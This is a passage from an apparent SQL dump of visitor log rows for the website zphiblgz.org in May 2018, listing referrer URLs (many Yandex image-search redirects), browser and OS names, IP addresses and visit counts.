Fsearch%3Bimages%3B%3B&text=&etext=1785.mhhUvk9c4Cd9Qm19d4Qsx8aTCoQwogxPc7S0HZAXHw4.52f7e476477ab826897990c66a39d559854cf3bd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041S2dCc2cxbE5Ga19ZcktUbWtWX0w0SDhSVm1uUFpCSTFJaTdkeGs0TXZ0QSws&sign=86e520054b32636ede182be3df386feb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.254.86.52','000',2,0),(30350,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1785.t2-BJrqrO8k_gjbuF5fiKg-4bbotET6czZbvpmiCT94.c95a512def3e25b9caa54bc746f4a17857f22fd5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041R2U0a0k4NlJmU1JEQ2EzeXhXNUxjX1JsYUt6Rk41WkdhdmRLUEYzYkVtZyws&sign=d02a264b43787c0bcee472165ea27d9e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.186','000',2,0),(30351,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1785.fFwdbSZ60doLZdaOtXXkXLEY24-BhyTXwjMtzTS1108.b735236b7826fbbfc544aab42ae981cc526e1879&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Vk1IcUpoczBseTdzTDh5dEU5bTRaMFF2S0xOZmJTYmI0RnlxRzU0YTJHdyws&sign=1ba3c62b58799444473819b90737fd4b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.203.32','000',2,0),(30352,'2018-05-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1785.lRyyKPu_GCbuYE5ZrHrr_UKVVO18xb3d-hcwGyF7xas.8a8c3571be2b33b266fe4ac17afb0d1023ff252a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VlJCZFVVMGp4d2RZeU9Zdms1cVhXY016UkN3RzdBSWZNaVVoX0xKMTZXZyws&sign=c41bcfd4184eab33858f8ede8c8fb96e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.188','000',2,0),(30353,'2018-05-12','https://zphiblgz.org','Firefox','Windows','40.1','','105.186.214.117','000',2,0),(30354,'2018-05-12','http://zphiblgz.org/','Edge','Macintosh','34.61390','','146.0.77.13','000',2,0),(30355,'2018-05-12','https://zphiblgz.org','Firefox','Windows','40.1','','110.54.236.190','000',2,0),(30356,'2018-05-12','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',3,0),(30357,'2018-05-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.250.22','000',4,0),(30358,'2018-05-12','https://zphiblgz.org','python-requests','Unknown','2.18.4','','35.161.55.221','000',2,0),(30359,'2018-05-12','https://professionalsolutions.eu/ru/','Opera','Windows','9.0','','46.118.114.175','000',1,0),(30360,'2018-05-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(30361,'2018-05-12','https://zphiblgz.org','Firefox','Linux','18.0','','188.93.56.216','000',2,0),(30362,'2018-05-12','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.17','000',1,0),(30363,'2018-05-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','61.154.29.29','000',2,0),(30364,'2018-05-12','http://zphiblgz.org/','Firefox','Linux','53.0','','163.172.4.153','000',1,0),(30365,'2018-05-12','https://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(30366,'2018-05-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30367,'2018-05-12','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.95.30.29','000',2,0),(30368,'2018-05-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(30369,'2018-05-12','https://zphiblgz.org','Chrome','Linux','26.0.1410.43','','185.220.101.28','000',1,0),(30370,'2018-05-12','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','107.77.203.201','000',1,0),(30371,'2018-05-12','http://zphiblgz.org','MSIE','Windows','9.0','','5.206.194.204','000',2,0),(30372,'2018-05-12','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(30373,'2018-05-12','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(30374,'2018-05-12','https://zphiblgz.org','Firefox','Windows','40.1','','151.28.252.205','000',2,0),(30375,'2018-05-13','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(30376,'2018-05-13','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.20.214','000',2,0),(30377,'2018-05-13','https://zphiblgz.org/event/ms-walk-2017/','AppleWebKit','Windows','534','','40.77.190.65','000',1,0),(30378,'2018-05-13','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.21','000',2,0),(30379,'2018-05-13','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(30380,'2018-05-13','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(30381,'2018-05-13','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.52','000',1,0),(30382,'2018-05-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.vsqR8T3hhAW1foFyyoAS85Tq7SdhyaAeUpfNIpudJAw.83e7ecc2d43c9096e967570ac0adf013e5a931e0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041OFJQbEkzano2M0N2SHVoU1lDakQ5d2VqTzFsV3BwUmJxd0NybnlObFJsZyws&sign=4df926dd4956c00bacf4e543eee210f4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.187.223.174','000',2,0),(30383,'2018-05-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.dNrXLhqMaE_hvWUi2O-MtjlrD3iqM_SaVB96hMqp_CE.1b2fcbdd36cc0c31293299b916fc5dea925a9c99&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SFVuR2NCSkZhdFRjbHlmTndmUDUzc1lFeU5kMnRjRnlfeTRYY04xUVFxdyws&sign=83e1c5b09e310f563191ccbcce586f0e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','52.58.155.179','000',2,0),(30384,'2018-05-13','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.-tGkGlaUoGaDkbOJz5rPPu1tgKqGLAseZaoeMA0nA3I.7be873b85260030269cfb79633ab3bddb0299db4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043eTBocWowdm51WFpLZlhVejU2ZURFY0ZtamhpYVBnci0zVC15dGpKajQ1dyws&sign=7a97c95839f82ba4a2bccb38e3d15593&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.127.156','000',2,0),(30385,'2018-05-13','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.bKnwfbTEPc2rH3UGsv4WlFhHA8V4nOQju0NCqUZgbVE.6eafd20789c85f800d2aa675b8190f440003ca43&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041cHNPX01BSlZOLWw3d1l6MWdyUmw5WHYxX0lTejdEMzZ3bWVITEEwVGw3QSws&sign=a329f3973a9da3dfb9a5ea72d6fde2f3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.175.32','000',2,0),(30386,'2018-05-13','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(30387,'2018-05-13','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(30388,'2018-05-13','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.ecPqSqBX2RzQQkI_wuOdr8gsT9tf4rqbfDeShF0RDRw.bc185cb1673504306be2dd7799dc96bf9b69e8d0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZXVVOENsRWVxWUJGSi12RmJlcWpyZmp6RHdkaHZJQ2VIRHJJLTNvTnAtdyws&sign=67667f216d1149c36f78c0d8fb1a8409&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.170.164','000',2,0),(30389,'2018-05-13','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1786.nP2wDLlMidSOBUKE4cpXCki1IU85PUwz_u7mcPWh54U.b7dc697aa80d319aa8de6fd0a5fb2b81826cba76&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RkZVamhiQmRtclh5eE1hLUVYVXhGOXUtN2JpejI5UXhfei1kb29rdEtnUSws&sign=1423d9b345b8224915b592af5917b886&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.219.21','000',2,0),(30390,'2018-05-13','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(30391,'2018-05-13','https://zphiblgz.org','Chrome','Windows','66.0.3359.139','','73.133.254.145','000',3,0),(30392,'2018-05-13','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.33','000',1,0),(30393,'2018-05-13','https://zphiblgz.org','Firefox','Windows','40.1','','216.241.155.66','000',2,0),(30394,'2018-05-13','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(30395,'2018-05-13','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30396,'2018-05-13','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','188.166.58.102','000',5,0),(30397,'2018-05-13','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.155.165','000',1,0),(30398,'2018-05-13','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.114','000',1,0),(30399,'2018-05-13','https://www.google.com/','Chrome','Windows','66.0.3359.139','','96.244.131.88','000',3,0),(30400,'2018-05-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30401,'2018-05-13','https://www.google.com/','Chrome','Android','65.0.3325.109','','174.205.9.240','000',2,0),(30402,'2018-05-13','https://zphiblgz.org','MSIE','Windows','9.0','','185.234.217.220','000',10,0),(30403,'2018-05-13','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(30404,'2018-05-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.21.188.76','000',1,0),(30405,'2018-05-13','https://www.google.com/','Safari','Macintosh','11.1','','108.51.110.17','000',2,0),(30406,'2018-05-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.152.111','000',1,0),(30407,'2018-05-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','122.28.55.137','000',1,0),(30408,'2018-05-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.75.251.205','000',1,0),(30409,'2018-05-13','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',3,0),(30410,'2018-05-13','https://zphiblgz.org','Firefox','Windows','40.1','','177.46.109.181','000',2,0),(30411,'2018-05-13','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(30412,'2018-05-13','https://zphiblgz.org','Firefox','Windows','40.1','','190.186.174.57','000',2,0),(30413,'2018-05-14','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',13,0),(30414,'2018-05-14','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.127.156','000',2,0),(30415,'2018-05-14','https://laminat.com.ua/','MSIE','Windows','6.0','','46.118.114.175','000',3,0),(30416,'2018-05-14','https://zphiblgz.org','Firefox','Windows','40.1','','181.229.220.41','000',2,0),(30417,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',2,0),(30418,'2018-05-14','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(30419,'2018-05-14','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(30420,'2018-05-14','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(30421,'2018-05-14','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1787.iZHtC8Zb1Nrn2tCxvAK_phjSNsfatZJzTc06ufv5VjA.334e4163842966c3e3fd852b15b6769cf76e9a17&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VjN1M2FBSVp4eElQQ180R21VQUtkeVVvVU5sblNFZHNiWnVkcjVsQmd2USws&sign=b9caff10da02a5639f0ed616e795bbd5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.227.92','000',2,0),(30422,'2018-05-14','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.91.149','000',2,0),(30423,'2018-05-14','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1787.jtAy2ulJ3K87gxrn0ZQWZruloHox8gwyCjSrzRccZs4.4bd52566e30b12ab534cba389ad24a9285ec159e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TGJHOVJHd19PcHBDWlpEb3VOQ0l6NDVLeFJoNEVjR25SV2d2RWlQOVpydyws&sign=9d01e69ff4e48715fd4b30244804e6b7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.81.209.50','000',2,0),(30424,'2018-05-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(30425,'2018-05-14','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1787.ZOxmaQsw1-yslqULih81QELY0L3FXqOb3VPYjwYIKpg.b8a295f1ca1c79f6a401dda1d7588cc340e8518f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VEUxQWxmSmI0SUlrRlpBVktxZGZXVlljTFZ3Rjd4Nk1iVzB4bjMzeGk0USws&sign=0687208a7f1cb9469eaf54940c58f704&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.129.35','000',2,0),(30426,'2018-05-14','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(30427,'2018-05-14','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1787.1rYIcXhWUPXe-hsc3MoNH_8CDeJ3JKwgemfARPl3VXo.f369dea4940659d0ecdd6a046d1d54718e69a1bc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MlZaSXh3dVU3d1p3S1Y3R0kzX290U19YakNGYnVhd3FPOUdMOC1XU05OQSws&sign=c047f2c1f984c21d4e8b8387101322d1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.119.241','000',2,0),(30428,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(30429,'2018-05-14','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(30430,'2018-05-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.147','000',2,0),(30431,'2018-05-14','http://zphiblgz.org/bitrix/admin/','Opera Next','Windows','49.0.2711.0','','194.28.115.251','000',1,0),(30432,'2018-05-14','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(30433,'2018-05-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','218.66.74.73','000',2,0),(30434,'2018-05-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(30435,'2018-05-14','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(30436,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30437,'2018-05-14','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',3,0),(30438,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.190','000',5,0),(30439,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.86','000',4,0),(30440,'2018-05-14','https://zphiblgz.org','Firefox','Windows','40.1','','170.83.101.155','000',2,0),(30441,'2018-05-14','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.84','000',1,0),(30442,'2018-05-14','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.66','000',1,0),(30443,'2018-05-14','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.221.56.146','000',2,0),(30444,'2018-05-14','https://zphiblgz.org','Firefox','Windows','40.1','','200.90.248.101','000',2,0),(30445,'2018-05-14','https://zphiblgz.org/','Firefox','Windows','43.0','','137.74.132.80','000',2,0),(30446,'2018-05-15','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(30447,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(30448,'2018-05-15','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(30449,'2018-05-15','https://zphiblgz.org','Firefox','Macintosh','52.0','','104.155.75.50','000',19,0),(30450,'2018-05-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.101.102.111','000',4,0),(30451,'2018-05-15','https://zphiblgz.org','Safari','Linux','538.1','','46.101.102.111','000',3,0),(30452,'2018-05-15','https://zphiblgz.org','python-requests','Unknown','2.10.0','','46.101.102.111','000',2,0),(30453,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.102.51.78','000',1,0),(30454,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','72.52.77.102','000',1,0),(30455,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',1,0),(30456,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(30457,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.145','000',2,0),(30458,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.22','000',2,0),(30459,'2018-05-15','https://zphiblgz.org','Firefox','Windows','40.1','','180.46.162.248','000',2,0),(30460,'2018-05-15','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(30461,'2018-05-15','android-app://com.google.android.googlequicksearchbox','Chrome','Android','66.0.3359.158','','74.193.157.171','000',2,0),(30462,'2018-05-15','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.139','','66.250.190.28','000',3,0),(30463,'2018-05-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','165.227.113.123','000',1,0),(30464,'2018-05-15','https://zphiblgz.org','Firefox','Windows','40.1','','51.39.145.88','000',2,0),(30465,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.z5Hl3W9-ZCOzhM334j1zNO_7mXzUrhtE-yoeHx1h7pI.93057da666fcae51e10616bf4cabcd73b93693b9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UFg3UGdsaWUzbFVnWGxjX2xlckhfNzNRVmxvRU1Ibm1sbWVKcVVRbmV4USws&sign=65d5ca1b8c9022eec34939b11ea60fcf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','207.148.71.118','000',2,0),(30466,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.VqNJzyAs0As1EqNfh4O9OajAx415zXsVOG1zNnoYC60.80d584b700a4c6762a4bfb9227f8f804de6d6aaf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NGtBWnlzMlJyS0t0dm9lbEVUS2FoMEEyTWpvTnlxRXQ5TUtYSVp4ZV9mdyws&sign=bb0fa68efb5aa7a5ef6b080c1f0c3932&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.161.26','000',2,0),(30467,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.LpxCVILYugkf8hqmrjU5oz5U0gjAzi7tBgycMuhrgeA.bc70938cc3dacc0ed9a66c01d9b67632d1ea636c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043dWdSS1N2b2ZOUU0tWXNEVTJ0NzRmSl9ubU5QTm9BRkw4UmFZVXhlTW9TUSws&sign=8767f6537d21ac95a71602af133846d0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','104.236.50.145','000',2,0),(30468,'2018-05-15','https://zphiblgz.org','Xenu','Unknown','Unknown','','79.7.218.134','000',1,0),(30469,'2018-05-15','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.181.239','000',2,0),(30470,'2018-05-15','https://zphiblgz.org','Firefox','Windows','40.1','','31.42.57.153','000',2,0),(30471,'2018-05-15','https://zphiblgz.org','Chrome','Chrome OS','65.0.3325.209','','69.140.242.93','000',6,0),(30472,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.Nshhc4nSk9mvhCoWUpLYyL32HKlYOgQQm-yXSll5Rzc.a5296deae2a4424ef7ac6f800d56ae5817a4ce5c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042d3dPTFlxTTNfYllmWGlZTXZ3OUNFdXBoaTZoc1c4TzVDN0gxMkdxOFctZyws&sign=61ffaed90a8353b5a430257e2340a03e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.119.241','000',2,0),(30473,'2018-05-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(30474,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.urlFbZ0uZyBUuzusbuLoHdow0hTdlPCB5ilQLki4YSI.d7a3851b59b5eb09dbb9b0628407c624b9c41411&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042enJnT0xoMy1iMWNpZGYzdTFyY1c4ajlkdHBOcFJ6cXB0MTI1Unl6RmthQSws&sign=0c9c47a770f83b78a3874f3474c12a9a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.65.20.58','000',2,0),(30475,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','5.9.158.75','000',1,0),(30476,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.-MoYxDy7kkMYwwjxDWvCiVC7ufFkCTEgRmhK00ZGhwA.563f4074e38a2d9753d0a9e2f33c97e0094619e2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040VVZ6d0ZUNFZDUTV6TkNfNFR6bkZ1dU9rQ3pmY0tOaGhnWndrQm1OMDRFUSws&sign=10901449dfd3fc069d8e2361528060c5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.189','000',2,0),(30477,'2018-05-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1788.sBe9T6NJJnV_vNP2DPcb8R16YngzBf-7PbQ6wbxHJMM.0efbdc108732e2b7e31f08da060b7d531bf03320&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VjNYQllSWEtlX3IxMEdGTHFyVDFBc0dmV2pqcXF1ZHJZdHRsSHNJWUVDdyws&sign=0d577089c4d869fedaaa96428e25831f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.155.237','000',2,0),(30478,'2018-05-15','https://zphiblgz.org','Firefox','Linux','39.0','','199.66.201.19','000',2,0),(30479,'2018-05-15','https://zphiblgz.org/ts_teams/shanee-satchell/','AppleWebKit','Windows','534','','40.77.188.103','000',1,0),(30480,'2018-05-15','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.35','000',1,0),(30481,'2018-05-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.